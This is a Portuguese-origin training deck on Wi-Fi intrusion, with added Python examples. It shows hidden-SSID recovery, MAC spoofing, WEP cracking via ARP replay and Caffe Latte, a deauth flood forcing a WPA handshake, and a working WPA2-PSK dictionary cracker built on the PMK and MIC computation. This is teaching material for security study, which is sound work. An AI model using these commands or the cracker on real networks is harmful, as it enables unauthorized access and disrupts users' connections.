Intrusion in Wireless Networks
Nelson Murilo
Clavis Segurança da Informação
$ whoami
Infosec consultant
2 published books
Pentester
Forensic investigator
Incident handler
Instructor and speaker
Contacts
nmurilo@gmail.com
nelson.murilo
@nelsonmurilo
Course outline
Introduction
Wi-Fi network concepts
Main vulnerabilities
Current tools
Probing and mapping
Identifying the environment
Attacks
Wrapping up
Introduction
Concepts
Characteristics
Wireless networks
Wi-Fi
Bluetooth
Infrared
WiMax
RFID
Cellular (GSM/TDMA/CDMA, etc.)
ZigBee (802.15.4)
UWB (802.15.3)
IEEE 802.11
Current standards:
802.11b: 11 Mb/s, 2.4 GHz
802.11a: 54 Mb/s, 5 GHz
802.11g: 54 Mb/s, 2.4 GHz
802.11i: security mechanisms (WPA2: CCMP/AES and the 4-way key handshake)
802.1X: port-based authentication, used on both wired and wireless networks
802.11n: higher throughput through MIMO and channel bonding (108 Mb/s nominal in early gear; up to 600 Mb/s in the ratified standard)
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwconfig
lo no wireless extensions.
23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
Network name disclosure
AP 00:07:40:4D:1A:5C
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
Hiding the SSID only empties the beacon (the "Beacon ()" entries above). Any client that already knows the network sends the name in clear in its probe requests, and the AP echoes it back in the probe response, so a passive listener recovers the name as soon as one client connects.
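The correlation described above, as an added example that is not part of the course material: a small parser for tcpdump's 802.11 text output that records APs beaconing an empty SSID, recovers their name from probe requests and responses addressed to the same BSSID, and lists which networks each client is asking for (its preferred-network list leaks the same way). The sample capture is constructed in the tcpdump `-e` format, modeled on the lines above; MACs and SSIDs are the ones from those lines plus one made-up network.

```python
import re
from collections import defaultdict

# Constructed sample capture in tcpdump's 802.11 text format (as printed by
# "tcpdump -e -i mon0 -s 0"), modeled on the course's lines: an AP beaconing
# an empty SSID, the client that knows it, and an ordinary AP.
SAMPLE_CAPTURE = """\
23:05:16.386193 BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:Broadcast SA:00:07:40:4d:1a:5c (oui Unknown) Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11, PRIVACY
23:05:17.321039 BSSID:00:1b:11:50:2f:2e (oui Unknown) DA:Broadcast SA:00:1b:11:50:2f:2e (oui Unknown) Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
09:15:42.216583 BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit]
09:15:42.219004 BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown) Probe Response (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit] CH: 11, PRIVACY
09:15:43.500121 BSSID:Broadcast DA:Broadcast SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (CoffeeShop) [1.0 2.0 5.5 11.0 Mbit]
"""

TYPE_RE = re.compile(r"(Beacon|Probe Request|Probe Response) \(([^)]*)\)")
MAC = r"([0-9a-f]{2}(?::[0-9a-f]{2}){5}|Broadcast)"
BSSID_RE = re.compile(r"BSSID:" + MAC, re.I)
SA_RE = re.compile(r"\bSA:" + MAC, re.I)
CH_RE = re.compile(r"CH: (\d+)")


def parse_frame(line):
    """Fields of one tcpdump line, or None if it is not a beacon/probe frame.
    Works with and without -e (without it there is no BSSID/SA to read)."""
    m = TYPE_RE.search(line)
    if not m:
        return None
    bssid = BSSID_RE.search(line)
    sa = SA_RE.search(line)
    ch = CH_RE.search(line)
    return {
        "type": m.group(1),
        "ssid": m.group(2),
        "bssid": bssid.group(1).lower() if bssid else None,
        "sa": sa.group(1).lower() if sa else None,
        "channel": int(ch.group(1)) if ch else None,
        "privacy": "PRIVACY" in line,
    }


def analyze(capture_text):
    """Which APs hide their SSID, which probe frames give the name away,
    and which SSIDs each client probes for."""
    hidden = {}                  # bssid -> channel of the empty-SSID beacon
    revealed = {}                # bssid -> SSID learned from probe traffic
    privacy = {}                 # ssid -> AP advertises encryption
    probing = defaultdict(set)   # client MAC -> SSIDs it asks for
    for line in capture_text.splitlines():
        f = parse_frame(line)
        if f is None:
            continue
        if f["type"] == "Beacon":
            if f["ssid"] == "" and f["bssid"]:
                hidden[f["bssid"]] = f["channel"]
            elif f["ssid"]:
                privacy[f["ssid"]] = f["privacy"]
        elif f["type"] == "Probe Request":
            if f["ssid"] and f["sa"]:
                probing[f["sa"]].add(f["ssid"])
            if f["ssid"] and f["bssid"] in hidden:
                revealed[f["bssid"]] = f["ssid"]
        elif f["type"] == "Probe Response":
            if f["ssid"]:
                privacy[f["ssid"]] = f["privacy"]
            if f["bssid"] in hidden:
                revealed[f["bssid"]] = f["ssid"]
    return {
        "hidden": hidden,
        "revealed": revealed,
        "privacy": privacy,
        "probing": {mac: sorted(s) for mac, s in probing.items()},
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_CAPTURE)
    for bssid, ch in report["hidden"].items():
        print(f"hidden SSID on {bssid} (ch {ch}) revealed as {report['revealed'].get(bssid)!r}")
    for mac, ssids in report["probing"].items():
        print(f"client {mac} probes for {ssids}")
```

Feed it `tcpdump -e -i mon0 -s 0 type mgt` output; without `-e` the beacon lines carry no BSSID, so hidden networks are still counted but cannot be matched to the probes that name them.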
RADIUS / WPA-Enterprise (diagram): the AP relays 802.1X authentication to a RADIUS server, which checks the credential against a backend such as /etc/passwd, /etc/raddb/users or Oracle/MySQL; the credential can be a password, a digital certificate or biometrics.
Initial concepts
$ /sbin/ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:21:29:65:b8:45
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
Promiscuous mode
Promiscuous mode on a managed interface only delivers data frames of the network the card is associated to, already stripped of their 802.11 headers; beacons, probes and the encrypted frames of other networks require monitor mode.
# iwconfig wlan0
wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on
# iw wlan0 info
Interface wlan0
        index 32
        type managed
Monitor mode
# iw dev wlan0 interface add mon0 type monitor
# iwconfig mon0
mon0      IEEE 802.11bg  Mode:Monitor  Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
# iw mon0 info
Interface mon0
        index 35
        type monitor
Monitor mode
14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1, PRIVACY[|802.11]
14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP Encrypted 0us Data IV:5b5 Pad 20 KeyID 2
14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
Channel selection
14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]
14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[|802.11]
14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[|802.11]
3 packets captured
AP identification
airodump-ng station section (clients seen with 00:25:9C:36:A0:9F):
BSSID              STATION            PWR   Rate   Lost  Packets  Probes
00:25:9C:36:A0:9F  00:0E:2E:EC:6B:05   -1   11 - 0     0        1
00:25:9C:36:A0:9F  00:0E:2E:45:F5:B3   -1   11 - 0     0        1
airodump-ng AP section (CH and MB columns not recoverable from the slide):
BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER  AUTH  ESSID
00:25:9C:36:A0:9F  -88   15       18    108    4   -   -  OPN               bsbca
Traffic analysis
tshark -r Kismet-20120309-04-23-25-1.pcapdump
6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR
AP identification
Traffic analysis (associating to the open network bsbca):
iwconfig wlan5 essid bsbca
iwconfig wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
MAC filtering
Restricting association to a list of allowed client MAC addresses is no protection: the allowed addresses travel in clear in every frame captured in monitor mode, and the attacker simply adopts one of them (preferably after that client has left, to avoid address conflicts):
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01
Mac OS X
# ifconfig en0 ether 00:00:00:00:00:01
FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01
OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Wired Equivalent Privacy
A fragile protocol: RC4 is keyed with a 24-bit IV prepended to the shared key, the IV is sent in clear and repeats within hours on a busy network, and the weak-IV (FMS/KoreK) and PTW statistical attacks recover the key from a few tens of thousands of captured IVs,
or, when the key was derived from a passphrase, by dictionary.
Kismet (kismet.conf excerpts):
logtypes=pcapdump,gpsxml,netxml,nettxt,alert
gps=true
preferredchannels=1,6,11
allowplugins=true
$ ls -lh Kismet*
-rw-r--r-- 1 root root 8.0M 2012-02-20 14:04 Kismet-20120220-13-47-37-1.pcapdump
http://blog.kismetwireless.net/
Aircrack-ng: a suite made up of several programs
Traffic analysis
Packet injection
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
airodump-ng cannot switch a managed interface that is in use; run it on the monitor interface created earlier:
# airodump-ng mon0
BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER  AUTH  ESSID
$ aircrack-ng labvirus-01.pcap
[00:00:05] Tested 633 keys (got 46103 IVs)

   KB    depth   byte(vote)
    0    2/  4   14(55552) 13(54528) 3C(53504) 98(53504) 24(53248)
    1    2/  1   DE(54784) 92(54528) 06(52992) 7D(52736) 02(52480)
    2    1/  3   82(56576) 18(54272) 45(53760) CD(53504) FC(53248)
    3    1/  3   09(57600) 08(55808) 41(55040) C9(54016) 8E(52992)
    4   51/  4   A1(48640) 83(48384) 86(48384) 99(48384) B2(48384)

         KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: naoxxxxxxxx )
         Decrypted correctly: 100%
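Why WEP is "fragile", as an added example (not code from the course or from aircrack-ng): a minimal WEP frame encryption (RC4 over IV||key, CRC-32 ICV) used to show two of the protocol's structural weaknesses that need no key recovery at all. First, keystream reuse: with a known plaintext (an ARP request, say) the keystream for one IV falls out by XOR, and any other frame under the same IV is readable. Second, CRC-32 is affine, so an attacker can flip chosen bits of the ciphertext and correct the ICV so the frame still verifies (the bit-flipping step behind chopchop and Caffe Latte). The key, IV and payloads are constructed; the statistical key-recovery attacks (FMS/PTW) that aircrack-ng performs are not implemented here.

```python
import zlib

# Constructed demo key and IV (not from the course capture). WEP-104 keys are 13 bytes;
# the 3-byte IV is sent in clear and prepended to the key, so the per-frame RC4 key
# repeats as soon as an IV repeats.
KEY = b"constructedK!"        # 13 bytes, constructed
IV = b"\x05\xb5\x00"          # constructed; the capture above showed IV:5b5


def rc4(key, data):
    """Plain RC4 (KSA + PRGA), as used by WEP."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    # WEP integrity check value: CRC-32 of the plaintext, little-endian
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key, iv, plaintext):
    """iv || RC4(iv||key)(plaintext || ICV). The key-ID byte is omitted."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key, frame):
    """Returns (plaintext, icv_ok)."""
    iv, body = frame[:3], frame[3:]
    clear = rc4(iv + key, body)
    pt, tag = clear[:-4], clear[-4:]
    return pt, tag == icv(pt)


def recover_keystream(frame, known_plaintext):
    """Keystream for this frame's IV, without the key: C xor (P || ICV(P)).
    ARP and DHCP traffic hand an attacker plenty of known plaintext."""
    return frame[:3], xor(frame[3:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame, iv, keystream):
    """Decrypt any other frame sent under the same IV (24-bit IVs repeat quickly)."""
    if frame[:3] != iv:
        raise ValueError("keystream only applies to frames with the same IV")
    body = frame[3:]
    return xor(body, keystream[:len(body)])[:-4]


def flip_bits(frame, delta):
    """Modify ciphertext without the key and keep the ICV valid: CRC-32 is affine,
    so crc(P xor D) = crc(P) xor crc(D) xor crc(0..0) for equal-length inputs."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    d = delta.ljust(n, b"\x00")
    icv_delta = (zlib.crc32(d) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor(body, d + icv_delta)


if __name__ == "__main__":
    f1 = wep_encrypt(KEY, IV, b"known ARP request payload.")
    f2 = wep_encrypt(KEY, IV, b"secret data in 2nd frame!!")
    iv, ks = recover_keystream(f1, b"known ARP request payload.")
    print(decrypt_with_keystream(f2, iv, ks))
    forged = flip_bits(wep_encrypt(KEY, IV, b"pay=0010"), bytes(4) + xor(b"00", b"99"))
    print(wep_decrypt(KEY, forged))
```

The second trick is what makes WEP unsafe even before the key is known: an ICV that the attacker can recompute offers no integrity, so forged or replayed frames are accepted by the AP and by clients alike.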
Wired Equivalent Privacy
Aireplay-ng
Generating traffic to collect IVs: a single ping from an associated host produces an ARP exchange, and ARP requests are the fixed-size, known-plaintext frames that aireplay-ng's ARP replay attack (-3) re-injects so the AP keeps emitting fresh IVs.
# ping -c 1 192.168.11.1
PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=255 time=54.9 ms

--- 192.168.11.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 54.973/54.973/54.973/0.000 ms
# arp -an
? (192.168.11.1) at 00:07:40:35:a1:18 [ether] on wlan0
# airodump-ng -c 11 mon0
BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER  AUTH  ESSID
Aireplay-ng: Caffe Latte
The Caffe Latte attack needs no access point: the attacker's card answers a WEP client's probes, lets it associate and bounces its own (bit-flipped) ARP frames back at it, harvesting IVs encrypted under the real key. Note that the BSSID captured below is the attacker's own interface (00:21:29:65:b8:45, the HWaddr shown in the ifconfig output earlier), acting as the fake AP.
# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap
   KB    depth   byte(vote)
    0    0/  1   6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
    1    0/  9   61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
    2   33/  2   AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
    3    7/  3   F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
    4    0/  2   B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)
A WPA/WPA2-PSK capture, unlike WEP, cannot be broken statistically; aircrack-ng refuses to proceed without a wordlist:
Opening labvirus_wpa-01.cap
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol
39965 377.079356 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 131 Key (msg 1/4)
39968 377.086048 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 160 Key (msg 2/4)
39969 377.089080 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 187 Key (msg 3/4)
39971 377.104480 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 136 Key (msg 4/4)
Forcing a new handshake: deauthenticating the client 00:26:5A:74:15:28 makes it reassociate and repeat the 4-way handshake, which airodump-ng records.
# aireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22  Waiting for beacon frame (ESSID: dlink) on channel 6
Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink".
08:49:22  Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63 ACKs]
On the victim, wpa_supplicant shows the association, the completed key negotiation and then the disconnect caused by the deauthentication:
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
# aircrack-ng dlink-01.cap
Opening dlink-01.cap
Read 60093 packets.

Cowpatty
$ time genpmk -f popular.dic -d dlink234.pmk -s dlink
real 9m2.988s
user 9m2.468s
sys 0m0.414s

$ time pyrit -i popular.dic -o dlink.pmk -e dlink passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Computed 109216 PMKs total; 1865 PMKs per second
real 1m20.753s
user 5m2.437s
sys 0m0.753s
Cowpatty
$ time cowpatty -d dlinkpop.pmk -s dlink -r dlink-01.cap
real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
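What the captured handshake, the deauth and the genpmk/pyrit/cowpatty timings above have in common, as an added example (not code from the course, aircrack-ng, cowpatty or pyrit): the WPA2-PSK key schedule written out. PBKDF2 turns passphrase and SSID into the PMK (4096 HMAC-SHA1 iterations, the slow step that genpmk and pyrit precompute per SSID), the 802.11i PRF expands PMK, both MACs and both nonces into the PTK, and the first 16 bytes of the PTK (the KCK) authenticate message 2 of the handshake. A dictionary attack therefore needs only message 1 and 2 (ANonce, SNonce, the MIC) and compares MICs per candidate. The SSID and MACs are the ones from the capture above; the passphrase, nonces, wordlist and the minimal EAPOL-Key frame are constructed. Key descriptor version 1 (WPA/TKIP, HMAC-MD5) is not covered.

```python
import hashlib
import hmac

# Identifiers from the course capture; passphrase, nonces and wordlist are constructed.
SSID = b"dlink"
AP_MAC = bytes.fromhex("001b11502f2e")    # BSSID 00:1B:11:50:2F:2E
STA_MAC = bytes.fromhex("00265a741528")   # client 00:26:5A:74:15:28


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The expensive step; it depends only on (passphrase, SSID), hence per-SSID PMK tables."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 over the whole EAPOL-Key frame."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce, replay_counter=1):
    """Constructed, minimal EAPOL-Key message 2/4 with the MIC field (bytes 81..96) zeroed."""
    body = (b"\x02"                            # descriptor type: RSN
            + b"\x01\x0a"                      # key info: version 2, pairwise, MIC present
            + b"\x00\x10"                      # key length 16 (CCMP)
            + replay_counter.to_bytes(8, "big")
            + snonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID
            + bytes(16)                        # MIC, zero while computing or verifying
            + b"\x00\x00")                     # key data length (real frames carry the RSN IE)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def precompute_pmks(wordlist, ssid):
    """What genpmk / pyrit passthrough do: a PMK table for one SSID, reusable across captures."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


def crack(pmk_table, anonce, snonce, msg2_mic_zeroed, captured_mic, aa=AP_MAC, spa=STA_MAC):
    """The cheap per-handshake step (cowpatty -d): derive a PTK from each candidate PMK and
    compare the MIC of message 2 with the captured one."""
    for word, pmk in pmk_table.items():
        ptk = ptk_from_pmk(pmk, aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2_mic_zeroed), captured_mic):
            return word
    return None


if __name__ == "__main__":
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))      # constructed nonces
    msg2 = build_msg2(snonce)
    real_pmk = pmk_from_passphrase(b"dlink2012", SSID)           # constructed "real" passphrase
    captured_mic = eapol_mic(ptk_from_pmk(real_pmk, AP_MAC, STA_MAC, anonce, snonce)[:16], msg2)
    table = precompute_pmks([b"password", b"12345678", b"dlink2012", b"qwertyui"], SSID)
    print(crack(table, anonce, snonce, msg2, captured_mic))
```

The split between `precompute_pmks` and `crack` is the whole point of genpmk and pyrit: the PBKDF2 work is paid once per (wordlist, SSID) and amortised over every handshake captured for that SSID, which is why the slide's 9-minute genpmk run is followed by a cowpatty pass that only does the cheap PRF and HMAC per candidate. It is also why an SSID that appears in published PMK tables (default vendor names such as "dlink") is a weaker choice than a unique one.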
Questions?
Criticism?
Suggestions?
Follow Clavis
http://clav.is/slideshare
http://clav.is/twitter
http://clav.is/facebook
Thank you very much!
monitoria@clavis.com.br
academia@clavis.com.br
Nelson Murilo
Clavis Segurança da Informação